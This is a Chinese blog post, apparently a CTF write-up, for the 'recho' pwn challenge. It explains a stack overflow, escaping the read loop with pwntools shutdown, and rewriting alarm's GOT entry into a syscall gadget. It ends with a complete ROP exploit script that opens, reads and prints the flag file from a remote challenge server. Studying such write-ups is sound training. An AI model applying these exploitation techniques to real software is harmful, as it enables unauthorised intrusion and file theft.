<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-flash.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-48x48-next.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Pwn," />










<meta name="description" content="前言一个有意思的溢出题，关键在于如何跳出循环ROP，是我没见过的船新版本，呜呜呜。 前置知识寻找syscallopen、write、read、alarm这些都是系统调用，其汇编代码中是有syscall的，例如alarm_got + 5  &#x3D; syscall 拼出open给eax传系统调用号+寄存器pop传参+syscall &#x3D; open(xxx) 注意： 函数的系统调用号可以在终端用命令跑出来：">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界-recho">
<meta property="og:url" content="https://www.sketchplane.top/2020/11/19/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-recho/index.html">
<meta property="og:site_name" content="sketch_pl4ne">
<meta property="og:description" content="前言一个有意思的溢出题，关键在于如何跳出循环ROP，是我没见过的船新版本，呜呜呜。 前置知识寻找syscallopen、write、read、alarm这些都是系统调用，其汇编代码中是有syscall的，例如alarm_got + 5  &#x3D; syscall 拼出open给eax传系统调用号+寄存器pop传参+syscall &#x3D; open(xxx) 注意： 函数的系统调用号可以在终端用命令跑出来：">
<meta property="og:image" content="https://t1.picb.cc/uploads/2020/11/19/Z2UaG1.png">
<meta property="og:image" content="https://t1.picb.cc/uploads/2020/11/19/Z2Ubjd.png">
<meta property="article:published_time" content="2020-11-19T09:06:12.000Z">
<meta property="article:modified_time" content="2020-11-19T10:44:53.375Z">
<meta property="article:author" content="sketch_pl4ne">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://t1.picb.cc/uploads/2020/11/19/Z2UaG1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://www.sketchplane.top/2020/11/19/攻防世界-recho/"/>





  <title>攻防世界-recho | sketch_pl4ne</title>
  








<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="sketch_pl4ne" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">
    <link rel="stylesheet" href="/dist/APlayer.min.css">
    <div id="aplayer"></div>
    <script type="text/javascript" src="/dist/APlayer.min.js"></script>
    <script type="text/javascript" src="/dist/music.js"></script>
  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">sketch_pl4ne</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://www.sketchplane.top/2020/11/19/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-recho/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sketch_pl4ne">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sketch_pl4ne">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">攻防世界-recho</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-11-19T17:06:12+08:00">
                2020-11-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  923
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>一个有意思的溢出题，关键在于如何跳出循环ROP，是我没见过的船新版本，呜呜呜。</p>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="寻找syscall"><a href="#寻找syscall" class="headerlink" title="寻找syscall"></a>寻找syscall</h3><p>open、write、read、alarm这些都是系统调用，其汇编代码中是有syscall的，例如<code>alarm_got + 5  = syscall</code></p>
<h3 id="拼出open"><a href="#拼出open" class="headerlink" title="拼出open"></a>拼出open</h3><p>给eax传系统调用号+寄存器pop传参+syscall = open(xxx)</p>
<p>注意： 函数的系统调用号可以在终端用命令跑出来：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">32位：</span></span><br><span class="line">cat /usr/include/asm/unistd_32.h | grep alarm</span><br><span class="line"><span class="meta">#</span><span class="bash">64位：</span></span><br><span class="line">cat /usr/include/asm/unistd_64.h | grep alarm</span><br></pre></td></tr></table></figure>

<h3 id="结束死循环"><a href="#结束死循环" class="headerlink" title="结束死循环"></a>结束死循环</h3><p>pwntools自带关闭流的函数： <code>io.shutdown( [&#39;in&#39;, &#39;out&#39;, &#39;read&#39;, &#39;recv&#39;, &#39;send&#39;, &#39;write&#39;])</code>，🛫️</p>
<p>注意：这个关闭流之后就没法在打开了，也就是说，我们<strong>无法走先泄漏真实地址再返回主函数</strong>故技重施的路子了，这里是直接一次ROP到底。</p>
<h2 id="题目信息"><a href="#题目信息" class="headerlink" title="题目信息"></a>题目信息</h2><p>首先，万年不变的起手checksec，没PIE没canary，针不戳：</p>
<p><img src="https://t1.picb.cc/uploads/2020/11/19/Z2UaG1.png" alt="checksec"></p>
<p>然后，IDA64分析代码：</p>
<img src="https://t1.picb.cc/uploads/2020/11/19/Z2Ubjd.png" alt="ida" style="zoom:80%;" />

<p>整个程序看下来，首先获取一个size，然后atoi()转成数字，在根据size大小获取输入，存入buf中。</p>
<p>这里显然存在一个栈溢出漏洞，问题在于我们第一次输入的size大于零，while就是死循环，我们如果不能结束循环就无法执行我们构造的ROP，幸好pwntools为我们提供了一个这样的函数：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shutdown</span><span class="params">(self, direction = <span class="string">"send"</span>)</span>:</span></span><br><span class="line">        <span class="string">"""shutdown(direction = "send")</span></span><br><span class="line"><span class="string">        Closes the tube for futher reading or writing depending on `direction`.</span></span><br><span class="line"><span class="string">        Arguments:</span></span><br><span class="line"><span class="string">          direction(str): Which direction to close; "in", "read" or "recv"</span></span><br><span class="line"><span class="string">            closes the tube in the ingoing direction, "out", "write" or "send"</span></span><br><span class="line"><span class="string">            closes it in the outgoing direction.</span></span><br><span class="line"><span class="string">        Returns:</span></span><br><span class="line"><span class="string">          :const:`None`</span></span><br></pre></td></tr></table></figure>

<p>接下来就是如何在一次ROP中获取flag，使用之前的暴露地址的方法是没法完成了，这里我们通过open来读取flag文件并打印出来。</p>
<p>我们想要实现的代码应该是这样的：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> fd = <span class="built_in">open</span>(<span class="string">"flag"</span>,READONLY);  </span><br><span class="line"><span class="built_in">read</span>(fd,buf,<span class="number">100</span>);</span><br><span class="line"><span class="built_in">printf</span>(buf);</span><br></pre></td></tr></table></figure>

<p>那么构造思路如下：</p>
<ol>
<li>想办法调用open，这里事先没有open，通过<code>alarm_got+5</code>得到syscall，然后给eax传open的系统调用号即可</li>
<li>read，buf存到bss段（因为这里可读可写，gdb中用<code>vmmap</code>可以查看各个段的RWX情况）</li>
<li>printf打印buf</li>
<li>io.shundown(‘send’)</li>
</ol>
<p><strong>注意：</strong></p>
<ul>
<li>这里有一条关键gadgets：<code>add_rdi_al_ret</code>，rdi里放alarm_got，al (即eax) 放5，使得alarm函数got表里的地址变成syscall</li>
<li>bss段在ida里看到的是从<code>0x601060</code>开始，但实际上用这个地址会读出奇怪的东西，改成<code>0x601070</code>或者更大就没问题</li>
<li>io.shutdown()里面的参数得是<code>[&#39;in&#39;, &#39;out&#39;, &#39;read&#39;, &#39;recv&#39;, &#39;send&#39;, &#39;write&#39;]</code>中的一个</li>
</ul>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">'linux'</span>, arch=<span class="string">'amd64'</span>, log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">'220.249.52.133'</span>, <span class="number">32168</span>)</span><br><span class="line">elf = ELF(<span class="string">'./recho'</span>)</span><br><span class="line"></span><br><span class="line">flag_str = next(elf.search(<span class="string">b'flag'</span>))</span><br><span class="line">bss = <span class="number">0x601070</span></span><br><span class="line">pop_rax_ret = <span class="number">0x4006fc</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x4008a3</span></span><br><span class="line">pop_rsi_r15_ret = <span class="number">0x4008a1</span></span><br><span class="line">pop_rdx_ret = <span class="number">0x4006fe</span></span><br><span class="line">add_rdi_al_ret = <span class="number">0x40070d</span></span><br><span class="line"></span><br><span class="line">alarm_got = elf.got[<span class="string">'alarm'</span>]</span><br><span class="line">alarm_plt = elf.plt[<span class="string">'alarm'</span>]</span><br><span class="line">read_plt = elf.plt[<span class="string">'read'</span>]</span><br><span class="line">printf_plt = elf.plt[<span class="string">'printf'</span>]</span><br><span class="line"></span><br><span class="line">io.sendlineafter(<span class="string">b'server!\n'</span>, str(<span class="number">0x200</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 这里是改变alarm的got表中的地址为syscall</span></span><br><span class="line">payload = cyclic(<span class="number">0x38</span>)+p64(pop_rdi_ret)+p64(alarm_got)+p64(pop_rax_ret)+p64(<span class="number">0x5</span>)+p64(add_rdi_al_ret)</span><br><span class="line"></span><br><span class="line"><span class="comment"># int fd = open("flag",READONLY); </span></span><br><span class="line">payload += p64(pop_rdi_ret)+p64(flag_str)+p64(pop_rsi_r15_ret)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(pop_rax_ret)+p64(<span class="number">2</span>)+p64(alarm_plt)</span><br><span class="line"></span><br><span class="line"><span class="comment"># read(fd,buf,100);</span></span><br><span class="line">payload += p64(pop_rdi_ret)+p64(<span class="number">3</span>)+p64(pop_rsi_r15_ret)+p64(bss)+p64(<span class="number">0</span>)+p64(pop_rdx_ret)+p64(<span class="number">0x30</span>)+p64(read_plt)</span><br><span class="line"></span><br><span class="line"><span class="comment"># printf(buf);</span></span><br><span class="line">payload += p64(pop_rdi_ret)+p64(bss)+p64(printf_plt)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 尽量使字符串长，这样才能将我们的payload全部输进去，不然可能因为会有缓存的问题导致覆盖不完整，eax</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x200</span>,<span class="string">b'\x00'</span>)</span><br><span class="line"></span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.shutdown(<span class="string">'send'</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>嗯，这题学到不少新东西。</p>
<p>首先是用io.shutdown(“send”)可以关闭流达到远程调试退出死循环的目的，然后是通过找gadgets可以利用已有的系统调用找出syscall，拼凑出未被导入的系统调用，还有就是open-&gt;read-&gt;printf这个读flag的方法。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Pwn/" rel="tag"># Pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/11/13/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C-supermarket/" rel="next" title="攻防世界-supermarket">
                <i class="fa fa-chevron-left"></i> 攻防世界-supermarket
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/11/24/%E6%A4%AD%E5%9C%86%E6%9B%B2%E7%BA%BF%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95/" rel="prev" title="椭圆曲线加密算法">
                椭圆曲线加密算法 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.jpg"
                alt="sketch_pl4ne" />
            
              <p class="site-author-name" itemprop="name">sketch_pl4ne</p>
              <p class="site-description motion-element" itemprop="description">二进制QAQ</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">34</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="glzjin" target="_blank">glzjin</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://lihuaiqiu.github.io/" title="离怀秋" target="_blank">离怀秋</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.cnblogs.com/wfzWebSecuity/" title="tr1ple" target="_blank">tr1ple</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://southsea.st/" title="南溟" target="_blank">南溟</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#前置知识"><span class="nav-number">2.</span> <span class="nav-text">前置知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#寻找syscall"><span class="nav-number">2.1.</span> <span class="nav-text">寻找syscall</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#拼出open"><span class="nav-number">2.2.</span> <span class="nav-text">拼出open</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#结束死循环"><span class="nav-number">2.3.</span> <span class="nav-text">结束死循环</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目信息"><span class="nav-number">3.</span> <span class="nav-text">题目信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EXP"><span class="nav-number">4.</span> <span class="nav-text">EXP</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>
    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">sketch_pl4ne</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">44.5k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  




  
  









  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three-waves.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
